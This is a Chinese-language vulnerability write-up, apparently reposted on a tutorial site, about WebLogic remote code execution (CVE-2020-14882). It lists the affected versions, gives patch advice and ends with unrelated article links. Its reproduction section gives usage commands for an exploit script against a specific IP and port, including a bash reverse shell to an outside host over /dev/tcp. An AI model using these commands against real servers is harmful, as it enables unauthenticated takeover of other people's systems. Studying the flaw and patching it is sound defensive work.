C/C++教程
weblogic 远程代码执行 (CVE-2020-14882)
本文主要是介绍weblogic 远程代码执行 (CVE-2020-14882),对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
weblogic 远程代码执行 (CVE-2020-14882)
- weblogic 远程代码执行 (CVE-2020-14882)
- 0x01 漏洞描述
- 0x02 影响范围
- 0x03 漏洞复现
- 工具
- 0x04 漏洞修复
weblogic 远程代码执行 (CVE-2020-14882)
0x01 漏洞描述
Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。 远程攻击者可以通过发送恶意的HTTP GET 请求。成功利用此漏洞的攻击者可在未经身份验证的情况下控制 WebLogic Server Console ,并执行任意代码。
0x02 影响范围
Oracle Weblogic Server 10.3.6.0.0
Oracle Weblogic Server 12.1.3.0.0
Oracle Weblogic Server 12.2.1.3.0
Oracle Weblogic Server 12.2.1.4.0
Oracle Weblogic Server 14.1.1.0.0
0x03 漏洞复现
工具
cve-2020-14882_rce.py
python3 使用
查看用法
python cve-2020-14882_rce.py
whoami
python cve-2020-14882_rce.py -u http://118.193.36.37:44924 -c whoami
ls /tmp
python cve-2020-14882_rce.py -u http://118.193.36.37:44924 -c “ls /tmp”
反弹shell
python cve-2020-14882_rce.py -u http://118.193.36.37:44924 -c "bash -i >& /dev/tcp/119.29.67.4/9897 0>&1"
虽然显示漏洞检查失败 但是执行成功
0x04 漏洞修复
安装官方最新补丁进行升级:
https://www.oracle.com/security-alerts
由于该漏洞的补丁存在被绕过的风险,建议临时关闭后台/console/console.portal对外访问。
这篇关于weblogic 远程代码执行 (CVE-2020-14882)的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
您可能喜欢
-
【机器学习(二)】分类和回归任务-决策树(Decision Tree,DT)算法-Sentosa_DSML社区版11-25
-
增量更新怎么做?-icode9专业技术文章分享11-23
-
压缩包加密方案有哪些?-icode9专业技术文章分享11-23
-
用shell怎么写一个开机时自动同步远程仓库的代码?-icode9专业技术文章分享11-23
-
webman可以同步自己的仓库吗?-icode9专业技术文章分享11-23
-
在 Webman 中怎么判断是否有某命令进程正在运行?-icode9专业技术文章分享11-23
-
如何重置new Swiper?-icode9专业技术文章分享11-23
-
oss直传有什么好处?-icode9专业技术文章分享11-23
-
如何将oss直传封装成一个组件在其他页面调用时都可以使用?-icode9专业技术文章分享11-23
-
怎么使用laravel 11在代码里获取路由列表?-icode9专业技术文章分享11-23
-
怎么实现ansible playbook 备份代码中命名包含时间戳功能?-icode9专业技术文章分享11-22
-
ansible 的archive 参数是什么意思?-icode9专业技术文章分享11-22
-
ansible 中怎么只用archive 排除某个目录?-icode9专业技术文章分享11-22
-
exclude_path参数是什么作用?-icode9专业技术文章分享11-22
-
微信开放平台第三方平台什么时候调用数据预拉取和数据周期性更新接口?-icode9专业技术文章分享11-22
栏目导航
